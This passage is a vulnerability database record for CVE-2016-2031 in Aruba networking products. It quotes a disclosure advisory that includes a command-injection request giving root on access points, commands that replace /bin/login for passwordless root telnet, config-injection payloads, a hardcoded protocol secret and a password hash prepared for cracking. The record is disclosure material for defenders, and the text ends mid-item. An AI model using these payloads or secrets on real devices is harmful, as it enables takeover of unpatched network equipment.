      },
      {
        "model": "arubaos",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arubanetworks",
        "version": "*"
      },
      {
        "model": "aruba instant",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "arubanetworks",
        "version": "4.1.3.0"
      },
      {
        "model": "airwave",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "arubanetworks",
        "version": null
      },
      {
        "model": "airwave",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "arubanetworks",
        "version": "8.2.0.0"
      },
      {
        "model": "airwave network management",
        "scope": null,
        "trust": 0.8,
        "vendor": "aruba",
        "version": null
      },
      {
        "model": "instant",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "aruba",
        "version": "4.1.3.0"
      },
      {
        "model": "instant",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "aruba",
        "version": "4.2.3.1"
      },
      {
        "model": "arubaos",
        "scope": null,
        "trust": 0.8,
        "vendor": "aruba",
        "version": null
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.4.1.1"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.4.1.0"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.4.7"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.4.3"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.3.3.2"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.3.3.0"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.3.26"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.3.2.23"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.3.2.18"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.3.2.17"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.3.2.11"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.3.1.30"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.3.1.29"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.3.1.24"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.3.1"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "2.5.6.24"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "2.5.6.0"
      },
      {
        "model": "networks arubaos rn3.1.12",
        "scope": null,
        "trust": 0.3,
        "vendor": "aruba",
        "version": null
      },
      {
        "model": "networks arubaos rn",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.1.4"
      },
      {
        "model": "networks arubaos rn",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.1.13"
      },
      {
        "model": "networks arubaos rn",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.1.1"
      },
      {
        "model": "networks arubaos rn",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.1.0.0"
      },
      {
        "model": "networks arubaos rn",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.1.0"
      },
      {
        "model": "networks arubaos rn",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "2.0"
      },
      {
        "model": "networks arubaos rn",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "1.0"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "6.1.2.6"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "6.1.2.4"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "6.0.2.1"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "6.0.1.1"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "6.0"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "5.0.4.2"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "5.0.3.2"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "5.0.3.0"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "5.0.2.1"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "5.0.2.0"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "5.0.0"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.4.4.2"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.4.3.1"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.4.2.6"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.4.2.0"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.3.3.9"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.3.3.8"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.3.3.10"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "90207"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009614"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-2031"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "8.2.0.0",
                "versionStartIncluding": "",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:arubanetworks:aruba_instant:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.1.3.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:arubanetworks:aruba_instant:4.2.3.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-2031"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Sven Blumenstein from Google Security Team.",
    "sources": [
      {
        "db": "BID",
        "id": "90207"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201607-362"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2016-2031",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CVE-2016-2031",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 7.5,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "JVNDB-2016-009614",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "id": "CVE-2016-2031",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "JVNDB-2016-009614",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2016-2031",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "NVD",
            "id": "JVNDB-2016-009614",
            "trust": 0.8,
            "value": "Critical"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201607-362",
            "trust": 0.6,
            "value": "CRITICAL"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009614"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201607-362"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-2031"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple vulnerabilities exists in Aruba Instate before 4.1.3.0 and 4.2.3.1 due to insufficient validation of user-supplied input and insufficient checking of parameters, which could allow a malicious user to bypass security restrictions, obtain sensitive information, perform unauthorized actions and execute arbitrary code. Aruba Instant There is an input verification vulnerability in.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Multiple Arubanetworks Products are prone to multiple security vulnerabilities. Failed  exploit attempts will likely result in denial-of-service conditions. \nFollowing products and versions are affected:\nArubaOS (all versions)  are vulnerable. \nAirWave Management Platform 8.x prior to 8.2  are vulnerable. \nAruba Instant (all versions up to, but not including, 4.1.3.0 and 4.2.3.1)  are vulnerable. The\nVulnerabilities were discovered during a black box security assessment and\ntherefore the vulnerability list should not be considered exhaustive. Several\nof the high severity vulnerabilities listed in this report are related to the\nAruba proprietary PAPI protocol and allow remote compromise of affected devices. AMP: RabbitMQ Management interface exposed\n 2. AMP: XSRF token uses weak calculation algorithm\n 3. AMP: Arbitrary modification of /etc/ntp.conf\n 4. AMP: PAPI uses static key for calculating validation checksum (auth bypass)\n 5. (I)AP: Insecure transmission of login credentials (GET)\n 6. (I)AP: Built in privileged \"support\" account\n 7. (I)AP: Static password hash for support account\n 8. (I)AP: Unusual account identified (\"arubasecretadmin\")\n 9. (I)AP: Privileged remote code execution\n10. (I)AP: Radius passwords allow arbitrary raddb commands\n11. (I)AP: Unauthenticated disclosure of environment variables\n12. (I)AP: Information disclosure by firmware checking functionality\n13. (I)AP: Unauthenticated automated firmware update requests\n14. (I)AP: Firmware updater does not check certificates\n15. (I)AP: Forceful downgrade of FW versions possible\n16. (I)AP: Firmware update check discloses machine certificate\n17. (I)AP: Firmware is downloaded via unencrypted connection\n18. (I)AP: Firmware update Challenge/Response does not protect the Client\n19. (I)AP: Unencrypted private keys and certs\n20. (I)AP: Potential signature private key\n21. (I)AP: PAPI Endpoints exposed to all interfaces\n22. (I)AP: PAPI Endpoint does not validate MD5 signatures\n23. (I)AP: PAPI protocol encrypted with weak encryption algorithm\n24. (I)AP: PAPI protocol authentication bypass\n25. (I)AP: Broadcast with detailed system information (LLDP)\n26. (I)AP: User passwords are encrypted with a static key\n\n\nVulnerability Details\n=====================\n\n---------------------------------------------\n1. AMP: RabbitMQ Management interface exposed\n---------------------------------------------\n\nAMPs expose the management frontend for the RabbitMQ message queue on all\ninterfaces via tcp/15672 and tcp/55672. \n\n  # netstat -nltp | grep beam\n  tcp        0      0 127.0.0.1:5672              0.0.0.0:*\n       LISTEN      2830/beam.smp\n  tcp        0      0 127.0.0.1:17716             0.0.0.0:*\n       LISTEN      2830/beam.smp\n  tcp        0      0 0.0.0.0:15672               0.0.0.0:*\n       LISTEN      2830/beam.smp\n  tcp        0      0 0.0.0.0:55672               0.0.0.0:*\n       LISTEN      2830/beam.smp\n\nThe password for the default user \"airwave\" is stored in the world readable\nfile /etc/rabbitmq/rabbitmq.config in plaintext:\n\n  # ls -l /etc/rabbitmq/rabbitmq.config\n  -rw-r--r-- 1 root root 275 Oct 28 15:48 /etc/rabbitmq/rabbitmq.config\n  # grep default_ /etc/rabbitmq/rabbitmq.config\n          {default_user,\u003c\u003c\"airwave\"\u003e\u003e},\n          {default_pass,\u003c\u003c\"***REMOVED***\"\u003e\u003e}\n\n--------------------------------------------------\n2. AMP: XSRF token uses weak calculation algorithm\n--------------------------------------------------\n\nThe XSRF token is calculated based on limited sources of entropy, consisting of\nthe user\u0027s time of login and a random number between 0 and 99999. The algorithm\nIs approximated by the following example Python script:\n\n  base64.b64encode(hashlib.md5(\u0027%d%5.5d\u0027 % (int(time.time()),\nrandom.randint(0,99999))).digest())\n\n\n-----------------------------------------------\n3. AMP: Arbitrary modification of /etc/ntp.conf\n-----------------------------------------------\n\nIncorrect/missing filtering of input parameters allows injecting new lines and\narbitrary commands into /etc/ntp.conf, when updating the NTP settings via the\nweb frontend. \n\n  POST /nf/pref_network? HTTP/1.1\n  Host: 192.168.131.162\n  [...]\n\n  id=\u0026ip_1=192.168.131.162\u0026hostname_1=foo.example.com\u0026\n  subnet_mask_1=255.255.255.248\u0026gateway_1=192.168.131.161\u0026dns1_1=172.16.255.1\u0026\n  dns2_1=\u0026eth1_enabled_1=0\u0026eth1_ip_1=\u0026eth1_netmask_1=\u0026\n  ntp1_1=time1.example.com%0afoo\u0026ntp2_1=time2.example.com\u0026save=Save\n\nThe above POST requests results in the following ntp.conf being generated:\n\n  # cat /etc/ntp.conf\n  [...]\n  server time1.example.com\n  foo\n  server time2.example.com\n\n------------------------------------------------------------------------------\n4. AMP: PAPI uses static key for calculating validation checksum (auth bypass)\n------------------------------------------------------------------------------\n\nPAPI packets sent from an AP to an AMP are authenticated with a cryptographic\nchecksum. The packet format is only partially known, as it\u0027s a proprietary\nformat created by Aruba. A typical PAPI packet sent to an AMP is as follows:\n\n\n  0000   49 72 00 02 64 69 86 2d 7f 00 00 01 01 00 01 00  Ir..di.-........ \n  0010   20 1f 20 1e 00 01 00 00 00 01 3e f9 22 49 05 b3   . .......\u003e.\"I.. \n  0020   50 89 40 d3 5d 9d d6 af 46 98 c1 a6              P.@.]...F... \n\n\nThe following dissection of the above shown packet gives a more detailed\noverview of the format:\n\n  49 72                                                 ID\n  00 02                                                 Version\n  64 69 86 2d                                           PAPI Destination IP\n  7f 00 00 01                                           PAPI Source IP\n  01 00                                                 Unknown1\n  01 00                                                 Unknown2\n  20 1f                                                 PAPI Source Port\n  20 1e                                                 PAPI Destination Port\n  00 01                                                 Unknown3\n  00 00                                                 Unknown4\n  00 01                                                 Sequence Number\n  3e f9                                                 Unknown5\n  22 49 05 b3 50 89 40 d3 5d 9d d6 af 46 98 c1 a6       Checksum\n\n\nThe checksum is based on a MD5 hash of a padded concatenation of all fields and\na secret token. The secret token is hardcoded in multiple binaries on the AMP\nand can easily be retrieved via core Linux system tools:\n\n  $ strings /opt/airwave/bin/msgHandler | grep asd\n  asdf;lkj763\n\nUsing this secret token it is possible to craft valid PAPI packets and issue\ncommands to the AMP, bypassing the authentication based on the shared\nsecret / token. This can be exploited to compromise of the device. \nRandom sampling of different software versions available on\nAruba\u0027s website confirmed that the shared secret is identical for all versions. \n\n-------------------------------------------------------\n5. AP: Insecure transmission of login credentials (GET)\n-------------------------------------------------------\n\nUsername and password to authenticate with the AP web frontend are transmitted\nthrough HTTP GET. This method should not be used in a form that transmits\nsensitive data, because the data is displayed in clear text in the URL. \n\n  GET /swarm.cgi?opcode=login\u0026user=admin\u0026passwd=admin HTTP/1.1\n\nThe login URL can potentially appear in Proxy logs, the server logs or\nbrowser history. This possibly discloses the authentication data to\nunauthorized persons. \n\n--------------------------------------------\n6. AP: Built in privileged \"support\" account\n--------------------------------------------\n\nThe APs provide a built in system account called \"support\". When connected to\nthe restricted shell of the AP via SSH, issuing the command \"support\", triggers\na password request:\n\n\n  00:0b:86:XX:XX:XX# support\n  Password:\n\nA quick internet search clarified, that this password is meant for use by Aruba\nengineers only:\nhttp://community.arubanetworks.com/t5/Unified-Wired-Wireless-Access/OS5-0-support-password/td-p/26760\n\nFurther research on that functionality lead to the conclusion that this\nfunctionality provides root-privileged shell access to the underlying operating\nsystem of the AP, given the correct password is entered. \n\n-----------------------------------------------\n7. AP: Static password hash for support account\n-----------------------------------------------\n\nThe password hash for the \"support\" account mentioned in vulnerability #6 is\nstored in plaintext on the AP. \n\n  $ strings /aruba/bin/cli | grep ^bc5\n  bc54907601c92efc0875233e121fd3f1cebb8b95e2e3c44c14\n\nRandom sampling of different versions of Firmware images available on Aruba\u0027s\nwebsite confirmed that the password hash is identical for all versions. The\npassword check validating a given \"support\" password is based on the following\nalgorithm:\n\n  SALT + sha1(SALT + PASSWORD)\n\nWhere SALT equals the first 5 bytes of the password hash in binary\nrepresentation. It is possible to run a brute-force attack on this hash format\nusing JtR with the following input format:\n\n  support:$dynamic_25$c92efc0875233e121fd3f1cebb8b95e2e3c44c14$HEX$bc54907601\n\n------------------------------------------------------\n8. AP: Unusual account identified (\"arubasecretadmin\")\n------------------------------------------------------\n\nThe AP\u0027s system user configuration contains a undocumented account called\n\"arubasecretadmin\". This account was the root cause for CVE-2007-0932 and\nallowed administrative login with a static password. \n\n  /etc/passwd:\n  nobody:x:99:99:Nobody:/:/sbin/nologin\n  root:x:0:0:Root:/:/bin/sh\n  admin:x:100:100:Admin:/:/bin/telnet3\n  arubasecretadmin:x:101:100:Aruba Admin:/:/bin/telnet2\n  serial:x:102:100:Serial:/:/bin/telnet4\n\nFurther tests indicated that login with this account seems not possible as it\nis not mapped through Arubas authentication mechanisms. The reason for it being\nstill configured on the system is unknown. \n\n---------------------------------------\n9. AP: Privileged remote code execution\n---------------------------------------\n\nInsufficient checking of parameters allows an attacker to execute commands\nwith root privileges on the AP. The vulnerable parameter is \"image_url\" which\nis used in the Firmware update function. \n\n  GET /swarm.cgi?opcode=image-url-upgrade\u0026ip=127.0.0.1\u0026oper_id=6\u0026image_url=Aries@http://10.0.0.1/?\"`/usr/sbin/mini_httpd+-d+/+-u+root+-p+1234+-C+/etc/mini_httpd.conf`\"\u0026auto_reboot=false\u0026refresh=true\u0026sid=OWsiU5MM7DxVf9FRWe3P\u0026nocache=0.9368100591919084\nHTTP/1.1\n\nThe above example starts a new instance of mini_httpd on tcp/1234, which allows\nbrowsing the AP\u0027s filesystem. The following list of commands, if executed in\norder, start a telnet service that allows passwordless root login. \n\n  killall -9 utelnetd\n  touch /tmp/telnet_enable\n  echo \\#\\!/bin/sh \u003e /bin/login\n  echo /bin/sh \u003e\u003e /bin/login\n  chmod +x /bin/login\n  /sbin/utelnetd\n\nConnecting to the telnet service started by the above command chain:\n\n  # telnet 10.0.XX.XX\n  Trying 10.0.XX.XX... \n  Connected to 10.0.XX.XX. \n  Escape character is \u0027^]\u0027. \n  Switching to Full Access\n  /aruba/bin # echo $USER\n  root\n  /aruba/bin #\n\nPotential exploits of this vulnerability can be detected through the\nAP\u0027s log file:\n  [...]\n  Jan  1 02:43:47  cli[2052]: \u003c341004\u003e \u003cWARN\u003e |AP\n00:0b:86:XX:XX:XX2@10.0.XX.XX cli|\nhttp://10.0.XX.XX/?\"`/sbin/utelnetd`\"\n  [...]\n\n-------------------------------------------------------\n10. AP: Radius passwords allow arbitrary raddb commands\n-------------------------------------------------------\n\nInsufficient checking of the GET parameter \"cmd\" allows the injection of\narbitrary commands and configuration parameters in the raddb configuration. \n\nExample:\n  GET /swarm.cgi?opcode=config\u0026ip=127.0.0.1\u0026cmd=%27user%20foo%20foo%22,my-setting%3d%3d%22blah%20portal%0Ainbound-firewall%0Ano%20rule%0Aexit%0A%27\u0026refresh=false\u0026sid=Lppj9jT2xQmYKqjEx5eP\u0026nocache=0.10862623626107548\nHTTP/1.1\n\n  /aruba/radius/raddb/users:\n  foo Filter-Id == MAC-GUEST, Cleartext-Password := \"foo\",my-setting==\"blah\"\n\n\nAs shown in the above example, inserting a double-quote in the password allows\nto add additional commands after the password. \n\n-----------------------------------------------------------\n11. AP: Unauthenticated disclosure of environment variables\n-----------------------------------------------------------\n\nIt is possible to request a listing of environment variables by requesting a\nspecific URL on the AP\u0027s web server. The request does not require\nauthentication. \n\n  GET /swarm.cgi?opcode=printenv HTTP/1.1\n\n  HTTP/1.0 200 OK\n  Content-Type:text/plain; charset=utf-8\n  Pragma: no-cache\n  Cache-Control: max-age=0, no-store\n\n  Environment variables\n\n  CHILD_INDEX=0\n  PATH=/usr/local/bin:/usr/ucb:/bin:/usr/bin\n  LD_LIBRARY_PATH=/usr/local/lib:/usr/lib\n  SERVER_SOFTWARE=\n  SERVER_NAME=10.0.XX.XX\n  GATEWAY_INTERFACE=CGI/1.1\n  SERVER_PROTOCOL=HTTP/1.0\n  SERVER_PORT=4343\n  REQUEST_METHOD=GET\n  SCRIPT_NAME=/swarm.cgi\n  QUERY_STRING=opcode=printenv\n  REMOTE_ADDR=10.0.XX.XX\n  REMOTE_PORT=58804\n  HTTP_REFERER=https://10.0.XX.XX:4343/\n  HTTP_USER_AGENT=Mozilla/5.0 (X11; Linux x86_64; rv:38.0)\nGecko/20100101 Firefox/38.0 Iceweasel/38.3.0\n  HTTP_HOST=10.0.XX.XX:4343\n\n-----------------------------------------------------------------\n12. AP: Information disclosure by firmware checking functionality\n-----------------------------------------------------------------\n\nWhen the AP checks device.arubanetworks.com for a new firmware version, it\nsends detailed information of the AP in plaintext to the remote host. \n\n  POST /firmware HTTP/1.1\n  Host: device.arubanetworks.com\n  Content-Length: 2\n  Connection: keep-alive\n  X-Type: firmware-check\n  X-Guid: 2dbe42XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\n  X-OEM-Tag: Aruba\n  X-Mode: IAP\n  X-Factory-Default: Yes\n  X-Current-Version: 6.4.2.6-4.1.1.10_51810\n  X-Organization: ***REMOVED (Company Internal Name)***\n  X-Ap-Info: CC00XXXXX, 00:0b:86:XX:XX:XX, RAP-155\n  X-Features: 0000100001001000000000000000000000000000000000010000000\n\n----------------------------------------------------------\n13. AP: Unauthenticated automated firmware update requests\n----------------------------------------------------------\n\nThe web frontend of the AP provides functionality to initiate an automated\nfirmware update. Doing so triggers the AP to initiate communication with\ndevice.arubanetworks.com and automatically download and install a new firmware\nimage. The CGI opcode for that automatic update is \"image-server-check\" and it\nwas discovered that the \"sid\" parameter is not checked for this opcode. Therefor\nan attacker can issue the automatic firmware update without authentication by\nsending the following GET request to the AP. \n\n  GET /swarm.cgi?opcode=image-server-check\u0026ip=127.0.0.1\u0026sid=x\n\nAs shown above, the \"sid\" parameter has to be submitted as part of the URL, but\ncan be set to anything. Although all opcode actions follow the same calling\nscheme, \"image-server-check\" was the only opcode where the session ID was not\nvalidated. \n\nCombined with other vulnerabilities (#14, #15), this could be exploited to\ninstall an outdated, vulnerable firmware on the AP. \n\n----------------------------------------------------\n14. AP: Firmware updater does not check certificates\n----------------------------------------------------\n\nThe communication between AP and device.arubanetworks.com is secured by using\nSSL. The AP does not do proper certificate validation for the communication to\ndevice.arubanetworks.com. A typical SSL MiTM attack using DNS spoofing and a\nself-signed certificate allowed interception of the traffic between AP and\ndevice.arubanetworks.com. \n\n--------------------------------------------------\n15. AP: Forceful downgrade of FW versions possible\n--------------------------------------------------\n\nWhen checking device.arubanetworks.com for a new firmware image, the AP sends\nit\u0027s current version to the remote host. If there is no new firmware available,\ndevice.arubanetworks.com does not provide any download options. If the initial\nversion sent from the AP is modified by an attacker (via MiTM), the remote\nserver will reply with the current firmware version. The AP will then reject\nthat firmware, as it\u0027s current version is more recent/the same. Downgrading the\nversion does also not work based on the validation the AP does. \nThis behaviour can be overwritten if an attacker intercepts and modifies the\nreply from device.arubanetworks.com and adds X-header called\n\"X-Mandatory-Upgrade\". \n\nExample of a spoofed reply from device.arubanetworks.com:\n\n  HTTP/1.0 200 OK\n  Date: Wed, 11 Nov 2015 12:12:20 GMT\n  Content-Length: 91\n  Content-Type: text/plain; charset=UTF-8\n  X-Activation-Key: FXXXXXXX\n  X-Session-Id: 05d607dd-958b-42c4-a355-bd54e1a32e8e\n  X-Status-Code: success\n  X-Type: firmware-check\n  X-Mandatory-Upgrade: true\n  Connection: close\n\n\n  6.4.2.6-4.1.1.10_51810\n  23 http://10.0.0.1:4321/ArubaInstant_Aries_6.4.2.6-4.1.1.10_51810\n\n\nAs shown above, the Header \"X-Mandatory-Upgrade\" was added to the server\u0027s\nreply. This causes the AP to skip its validation checks and accept any firmware\nversion provided, regardless if it is the same or older than the current one. \n\n-----------------------------------------------------------\n16. AP: Firmware update check discloses machine certificate\n-----------------------------------------------------------\n\nWhile observing the traffic between an AP and device.arubanetworks.com, it was\ndiscovered that the AP discloses it\u0027s machine certificate to the remote\nendpoint. \n\n  POST /firmware HTTP/1.1\n  Host: 10.0.XX.XX\n  Content-Length: 2504\n  Connection: close\n  X-Type: firmware-check\n  X-Guid: 2dbe42XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\n  X-OEM-Tag: Aruba\n  X-Mode: IAP\n  X-Factory-Default: Yes\n  X-Session-Id: e0b24fb1-e2f7-4e06-9473-1266b50a3fec\n  X-Current-Version: 6.4.2.6-4.1.1.10_51810\n  X-Organization: ***REMOVED (Company Internal Name)***\n  X-Ap-Info: CC00XXXXX, 00:0b:86:XX:XX:XX, RAP-155\n  X-Features: 0000100001001000000000000000000000000000000000010000000\n  X-Challenge-Hash: SHA-1\n\n\n  -----BEGIN CERTIFICATE-----\n  MIIGTjCCBTagAwI... \n  [...]\n  -----END CERTIFICATE-----\n\n\nThe certificate sent in the above request is the same (in PEM format) as found\nunder the following path on the AP:\n\n  /tmp/deviceCerts/certifiedKeyCert.der\n\nComparison of the certificate from the HTTP Request and from the AP filesystem:\n\n  $ sha256sum dumped-fw-cert.txt certifiedKeyCert.der.pem\n  68ebb521dff53d8dcb8e4a0467dcae38cf45a0d812897393632bdd9ef6f354e8\ndumped-fw-cert.txt\n  68ebb521dff53d8dcb8e4a0467dcae38cf45a0d812897393632bdd9ef6f354e8\ncertifiedKeyCert.der.pem\n\n---------------------------------------------------------\n17. AP: Firmware is downloaded via unencrypted connection\n---------------------------------------------------------\n\nFirmware images are downloaded via unencrypted HTTP to the AP. An example reply\ncontaining the download paths 